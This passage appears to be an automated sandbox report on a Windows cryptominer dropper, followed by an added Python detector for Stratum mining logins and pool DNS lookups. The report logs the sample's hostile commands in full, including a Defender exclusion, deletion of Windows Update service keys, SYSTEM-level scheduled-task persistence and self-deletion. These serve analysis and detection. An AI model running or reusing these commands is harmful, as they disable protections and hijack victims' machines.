    Source: powershell.exe, 00000026.00000002.644851259.0000019FA7837000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000026.00000003.516178284.0000019FA7825000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.osofts/Microt0
    Source: powershell.exe, 00000007.00000002.413252609.00000237D95BF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.639801187.0000019F9F49B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 00000026.00000002.590838599.0000019F8F647000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: powershell.exe, 00000007.00000002.396775326.00000237C9768000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.590838599.0000019F8F647000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
    Source: powershell.exe, 00000007.00000002.395084188.00000237C9561000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.444436769.0000020D0BAC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.587356639.0000019F8F441000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000040.00000002.587692706.0000023700001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 00000007.00000002.396775326.00000237C9768000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.590838599.0000019F8F647000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
    Source: powershell.exe, 00000026.00000002.590838599.0000019F8F647000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: powershell.exe, 0000001A.00000002.470297536.0000020D2408B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.coDk
    Source: powershell.exe, 00000026.00000002.639801187.0000019F9F49B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000026.00000002.639801187.0000019F9F49B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000026.00000002.639801187.0000019F9F49B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
    Source: powershell.exe, 00000026.00000002.590838599.0000019F8F647000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
    Source: powershell.exe, 00000007.00000003.365569673.00000237CB1C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.448943625.0000020D0BCC8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.627931463.0000019F909FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.629177405.0000019F90AAB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.626183947.0000019F90914000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.632077474.0000019F90C6F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.627601047.0000019F909C5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
    Source: powershell.exe, 00000026.00000002.644851259.0000019FA7837000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000026.00000003.516178284.0000019FA7825000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://go.microsoft.c
    Source: powershell.exe, 00000007.00000002.413252609.00000237D95BF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.639801187.0000019F9F49B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
    Source: unknown | DNS traffic detected: queries for: pool.hashvault.pro
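Two of the three Snort hits above are the miner's own traffic: a DNS lookup of pool.hashvault.pro and a Stratum login to 199.247.19.116 on TCP port 80, a web port chosen so that a port-based egress filter lets the mining session through. Stratum is newline-delimited JSON-RPC, and the first message a miner sends is a `login` whose params carry the wallet, a password and a user agent, so the session can be recognised from content alone. The following is an added example and not Joe Sandbox or XMRig code: it parses a TCP payload for a Stratum login, scores it (agent string, Monero address shape, non-standard port) and pairs that with a pool-domain check on DNS query names. The login payload is constructed to mirror the shape of an XMRig login; the wallet string, agent version, the 203.0.113.10 destination and the pool label heuristic are assumptions, while pool.hashvault.pro and 199.247.19.116:80 come from the report.

```python
"""Content-based detection of a Stratum (JSON-RPC over TCP) mining login plus
a DNS-name check for the pool seen in the report. Added example; the payloads
below are constructed, not captured from this sample."""
import json
import re

# Pool domain from the report's DNS alert; the label pattern is a heuristic
# (assumption) for pools not on the list.
KNOWN_POOL_DOMAINS = {"pool.hashvault.pro"}
POOL_LABEL_HINT = re.compile(r"(^|\.)(pool|xmr|monero)[\w-]*\.", re.I)

# Monero primary addresses: 95 base58 characters starting with '4' ('8' for subaddresses).
XMR_ADDRESS = re.compile(r"^[48][1-9A-HJ-NP-Za-km-z]{94}$")


def iter_json_lines(payload: bytes):
    """Stratum is newline-delimited JSON; yield each parsable object."""
    for raw in payload.split(b"\n"):
        raw = raw.strip()
        if not raw.startswith(b"{"):
            continue
        try:
            yield json.loads(raw)
        except ValueError:
            continue


def stratum_login(payload: bytes):
    """Return login details if the payload carries a Stratum login, else None."""
    for msg in iter_json_lines(payload):
        if msg.get("method") != "login" or not isinstance(msg.get("params"), dict):
            continue
        p = msg["params"]
        wallet = str(p.get("login", ""))
        # Miners commonly append a worker name ('.rig1') or fixed difficulty ('+50000').
        bare_wallet = wallet.split("+")[0].split(".")[0]
        return {
            "agent": str(p.get("agent", "")),
            "wallet": wallet,
            "wallet_is_xmr": bool(XMR_ADDRESS.match(bare_wallet)),
            "algos": list(p.get("algo", [])),
        }
    return None


def classify_tcp_flow(dst_port: int, payload: bytes):
    """Reasons to flag the flow, or None; port is only a modifier because the
    report shows the Stratum session on TCP/80."""
    login = stratum_login(payload)
    if login is None:
        return None
    reasons = ["stratum-login"]
    if login["agent"].lower().startswith("xmrig"):
        reasons.append("xmrig-agent")
    if login["wallet_is_xmr"]:
        reasons.append("monero-wallet")
    if dst_port in (80, 443):
        reasons.append("non-standard-port")
    return reasons


def is_pool_lookup(qname: str) -> bool:
    q = qname.rstrip(".").lower()
    return q in KNOWN_POOL_DOMAINS or bool(POOL_LABEL_HINT.search(q + "."))


def triage(dns_queries, flows):
    """Combine both signals into one finding list for a host."""
    findings = [f"dns:{q}" for q in dns_queries if is_pool_lookup(q)]
    for dst, port, payload in flows:
        reasons = classify_tcp_flow(port, payload)
        if reasons:
            findings.append(f"tcp:{dst}:{port}:{'+'.join(reasons)}")
    return findings


# Constructed inputs. The wallet is a placeholder of the right shape, not a real address.
WALLET = "4" + "A" * 94
SAMPLE_LOGIN = (json.dumps({
    "id": 1, "jsonrpc": "2.0", "method": "login",
    "params": {"login": WALLET, "pass": "x",
               "agent": "XMRig/6.18.0 (Windows NT 10.0; Win64; x64)",
               "algo": ["rx/0", "cn/r"]}}) + "\n").encode()
SAMPLE_HTTP = b'POST /api HTTP/1.1\r\nHost: example.com\r\n\r\n{"method":"ping"}\n'
SAMPLE_DNS = ["pool.hashvault.pro", "www.microsoft.com"]
SAMPLE_FLOWS = [("199.247.19.116", 80, SAMPLE_LOGIN), ("203.0.113.10", 80, SAMPLE_HTTP)]

if __name__ == "__main__":
    for finding in triage(SAMPLE_DNS, SAMPLE_FLOWS):
        print(finding)
```

The JSON on port 80 is not HTTP, which is why the HTTP sample with a JSON body is not flagged: only a `login` method with a params object counts, and the agent and wallet checks then separate a Monero miner from other JSON-RPC traffic.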

    Operating System Destruction

    Source: C:\Program Files\WindowsServices\WindowsAutHost | Process information set: 01 00 00 00 (ProcessBreakOnTermination = 1, the BreakOnTermination flag from the signature list: the process is marked critical, so terminating it bugchecks the system)

    System Summary

    Source: 8iTXwpHCHb.exe | Static PE information: section name: .7Z\
    Source: 8iTXwpHCHb.exe | Static PE information: section name: .u4~
    Source: WindowsAutHost.0.dr | Static PE information: section name: .7Z\
    Source: WindowsAutHost.0.dr | Static PE information: section name: .u4~
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
    Source: C:\Program Files\WindowsServices\WindowsAutHost | File deleted: C:\Windows\Temp\34E5.tmp
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell
    Source: C:\Windows\System32\conhost.exe | Code function: 58_2_00007FF6935C2250
    Source: C:\Windows\System32\conhost.exe | Code function: 58_2_00007FF6935C29F0
    Source: C:\Windows\System32\conhost.exe | Code function: 58_2_00007FF6935C15C0
    Source: C:\Windows\System32\conhost.exe | Code function: 58_2_00007FF6935DE410
    Source: C:\Windows\System32\conhost.exe | Code function: 58_2_00007FF6935C62A0
    Source: C:\Windows\System32\conhost.exe | Code function: 58_2_00007FF6935E18B0
    Source: C:\Windows\System32\conhost.exe | Code function: String function: 00007FF6935F17C0 appears 59 times
    Source: C:\Windows\System32\conhost.exe | Code function: String function: 00007FF6935F0580 appears 107 times
    Source: C:\Windows\System32\conhost.exe | Code function: 58_2_00007FF6935C4040 NtDelayExecution
    Source: C:\Program Files\WindowsServices\WindowsAutHost | File created: C:\Program Files\Google\Libs\WR64.sys
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    Source: WindowsAutHost.0.dr | Static PE information: Number of sections : 14 > 10
    Source: 8iTXwpHCHb.exe | Static PE information: Number of sections : 14 > 10
    Source: 34E5.tmp.32.dr | Static PE information: Number of sections : 11 > 10
    Source: 8iTXwpHCHb.exe | Virustotal: Detection: 37%
    Source: 8iTXwpHCHb.exe | ReversingLabs: Detection: 26%
    Source: C:\Users\user\Desktop\8iTXwpHCHb.exe | File read: C:\Users\user\Desktop\8iTXwpHCHb.exe
    Source: C:\Users\user\Desktop\8iTXwpHCHb.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: unknown | Process created: C:\Users\user\Desktop\8iTXwpHCHb.exe C:\Users\user\Desktop\8iTXwpHCHb.exe
    Source: C:\Users\user\Desktop\8iTXwpHCHb.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\8iTXwpHCHb.exe | Process created: C:\Windows\System32\cmd.exe cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    Source: C:\Users\user\Desktop\8iTXwpHCHb.exe | Process created: C:\Windows\System32\cmd.exe cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\8iTXwpHCHb.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell <#ujtstfzc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsAutHost' /tr '''C:\Program Files\WindowsServices\WindowsAutHost'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsServices\WindowsAutHost') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsAutHost' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsAutHost" /t REG_SZ /f /d 'C:\Program Files\WindowsServices\WindowsAutHost' }
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop wuauserv
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop bits
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop dosvc
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    Source: C:\Users\user\Desktop\8iTXwpHCHb.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell <#agjywv#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "WindowsAutHost" } Else { "C:\Program Files\WindowsServices\WindowsAutHost" }
    Source: C:\Users\user\Desktop\8iTXwpHCHb.exeProcess created: C:\Windows\System32\cmd.exe cmd /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\8iTXwpHCHb.exe"
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /run /tn WindowsAutHost
    Source: unknownProcess created: C:\Program Files\WindowsServices\WindowsAutHost C:\Program Files\WindowsServices\WindowsAutHost
    Source: C:\Program Files\WindowsServices\WindowsAutHostProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Program Files\WindowsServices\WindowsAutHostProcess created: C:\Windows\System32\cmd.exe cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    Source: C:\Program Files\WindowsServices\WindowsAutHostProcess created: C:\Windows\System32\cmd.exe cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Program Files\WindowsServices\WindowsAutHostProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell <#ujtstfzc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsAutHost' /tr '''C:\Program Files\WindowsServices\WindowsAutHost'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsServices\WindowsAutHost') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsAutHost' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsAutHost" /t REG_SZ /f /d 'C:\Program Files\WindowsServices\WindowsAutHost' }
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bits
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvc
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    Source: C:\Program Files\WindowsServices\WindowsAutHostProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe qeiyvjdhkxdq
    Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
    Source: C:\Program Files\WindowsServices\WindowsAutHostProcess created: C:\Windows\System32\cmd.exe cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic PATH Win32_VideoController GET Name, VideoProcessor
    Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\8iTXwpHCHb.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -ForceJump to behavior
    Source: C:\Users\user\Desktop\8iTXwpHCHb.exeProcess created: C:\Windows\System32\cmd.exe cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /fJump to behavior
    Source: C:\Users\user\Desktop\8iTXwpHCHb.exeProcess created: C:\Windows\System32\cmd.exe cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0Jump to behavior
    Source: C:\Users\user\Desktop\8iTXwpHCHb.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell <#ujtstfzc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsAutHost' /tr '''C:\Program Files\WindowsServices\WindowsAutHost'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsServices\WindowsAutHost') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsAutHost' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsAutHost" /t REG_SZ /f /d 'C:\Program Files\WindowsServices\WindowsAutHost' }Jump to behavior
    Source: C:\Users\user\Desktop\8iTXwpHCHb.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell <#agjywv#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "WindowsAutHost" } Else { "C:\Program Files\WindowsServices\WindowsAutHost" }Jump to behavior
    Source: C:\Users\user\Desktop\8iTXwpHCHb.exeProcess created: C:\Windows\System32\cmd.exe cmd /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\8iTXwpHCHb.exe"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bits Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvc Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /fJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0 Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0 Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0 Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /run /tn WindowsAutHostJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3 Jump to behavior
    Source: C:\Program Files\WindowsServices\WindowsAutHostProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -ForceJump to behavior
    Source: C:\Program Files\WindowsServices\WindowsAutHostProcess created: C:\Windows\System32\cmd.exe cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /fJump to behavior
    Source: C:\Program Files\WindowsServices\WindowsAutHostProcess created: C:\Windows\System32\cmd.exe cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0Jump to behavior
